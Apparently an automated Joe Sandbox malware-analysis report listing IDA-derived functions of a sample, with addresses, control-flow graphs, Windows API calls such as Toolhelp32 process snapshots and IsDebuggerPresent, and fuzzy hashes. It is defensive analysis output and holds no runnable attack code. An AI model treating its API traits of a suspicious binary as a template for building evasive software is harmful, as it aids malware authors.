                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1430744539-2962942730
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 152 40af66-40af6e 153 40af7d-40af88 call 40b84d 152->153 156 40af70-40af7b call 40d2e3 153->156 157 40af8a-40af8b 153->157 156->153 160 40af8c-40af98 156->160 161 40afb3-40afca call 40af49 call 40cd39 160->161 162 40af9a-40afb2 call 40aefc call 40d2bd 160->162 162->161
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                                                                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AllocException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3622535130-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 171 401870-401883 call 40af66 174 4018b2 171->174 175 401885-4018a2 #2 171->175 176 4018b4-4018b8 174->176 175->176 177 4018a4-4018a6 175->177 178 4018c4-4018c9 176->178 179 4018ba-4018bf call 40ad90 176->179 177->176 180 4018a8-4018ad call 40ad90 177->180 179->178 180->174
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                                                                                                                                                                                                                                          • #2.OLEAUT32 ref: 00401898
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _malloc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1579825452-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 183 40d534-40d556 HeapCreate 184 40d558-40d559 183->184 185 40d55a-40d563 183->185
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

                                                                                                                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0047B594 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1ae262bbb86af0a4598cdd8b0d7fd7f20448e8bed12feec13612115d6eddc44d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B731C221905688AACF328A285844BF77B64DB61779F1DC157E64C8B3A2D33D9C40C7EE
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 287 417081-4170a0 288 4170a2-4170bb LCMapStringW 287->288 289 4170da-4170dd 287->289 292 4170c5-4170ce GetLastError 288->292 293 4170bd-4170c3 288->293 290 417101-417109 289->290 291 4170df-4170e2 289->291 295 4172bb-4172c4 290->295 296 41710f-417111 290->296 294 4170e5-4170e8 291->294 292->289 297 4170d0 292->297 293->289 298 4170f2-4170fb 294->298 299 4170ea-4170ed 294->299 301 4172c6-4172cb 295->301 302 4172ce-4172d1 295->302 296->295 300 417117-41711a 296->300 297->289 304 4170fd 298->304 305 4170fe 298->305 299->294 303 4170ef 299->303 306 417120-417126 300->306 307 4172ec-4172ee 300->307 301->302 308 4172d3-4172d8 302->308 309 4172db-4172ea call 417a20 302->309 303->298 304->305 305->290 312 417130-417157 MultiByteToWideChar 306->312 313 417128-41712d 306->313 311 417414-41741d 307->311 308->309 309->307 317 4172f3-4172f6 309->317 315 41741f call 40ce09 311->315 312->307 316 41715d 312->316 313->312 318 417424-417425 315->318 319 4171a2 316->319 320 41715f-417169 316->320 321 4173d7-4173ef LCMapStringA 317->321 322 4172fc-417316 call 417a69 317->322 323 4171a5-4171a8 319->323 320->319 324 41716b-417174 320->324 327 4173f1-4173f4 321->327 322->307 342 417318-417331 LCMapStringA 322->342 323->307 329 4171ae-4171c1 MultiByteToWideChar 323->329 325 417176-41717f call 40cfb0 324->325 326 417189-417192 call 40b84d 324->326 345 417181-417187 325->345 346 41719d-4171a0 325->346 326->346 348 417194 326->348 331 4173f6-4173fe call 40b6b5 327->331 332 4173ff-417404 327->332 335 4171c7-4171e2 LCMapStringW 329->335 336 4172aa-4172b6 call 4147ae 329->336 331->332 340 417412 332->340 341 417406-417409 332->341 335->336 344 4171e8-4171ef 335->344 336->311 340->311 341->340 349 41740b-417411 call 40b6b5 341->349 350 417333-417335 342->350 351 41733a 342->351 353 4171f1-4171f4 344->353 354 41721a-41721c 344->354 358 41719a 345->358 346->323 348->358 349->340 350->327 360 417379 351->360 361 41733c-41733f 351->361 353->336 355 4171fa-4171fd 353->355 356 417263 354->356 357 41721e-417228 354->357 355->336 362 417203-417215 LCMapStringW 355->362 367 417265-417267 356->367 357->356 363 41722a-417233 357->363 358->346 364 41737b-41737d 360->364 361->360 366 417341-417349 361->366 362->336 369 417235-41723e call 40cfb0 363->369 370 41724b-417254 call 40b84d 363->370 364->350 371 41737f-4173a3 call 40ba30 LCMapStringA 364->371 372 417361-41736a call 40b84d 366->372 373 41734b-417354 call 40cfb0 366->373 367->336 368 417269-41727f LCMapStringW 367->368 374 417281-417286 368->374 375 4172a3-4172a9 call 4147ae 368->375 369->336 393 417240-417249 369->393 396 417256-41725c 370->396 397 41725f-417261 370->397 394 4173a5-4173a7 371->394 395 4173a9-4173cb call 417a69 371->395 390 417375-417377 372->390 391 41736c-417372 372->391 373->350 398 417356-41735f 373->398 381 417288-41728a 374->381 382 41728c-41728f 374->382 375->336 389 417292-4172a0 WideCharToMultiByte 381->389 382->389 389->375 390->364 391->390 393->367 399 4173ce-4173d5 call 4147ae 394->399 395->399 396->397 397->367 398->364 399->327
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,20A11908), ref: 004170C5
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                                                                                                                                                                                                                                          • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                                                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                                                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3809854901-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

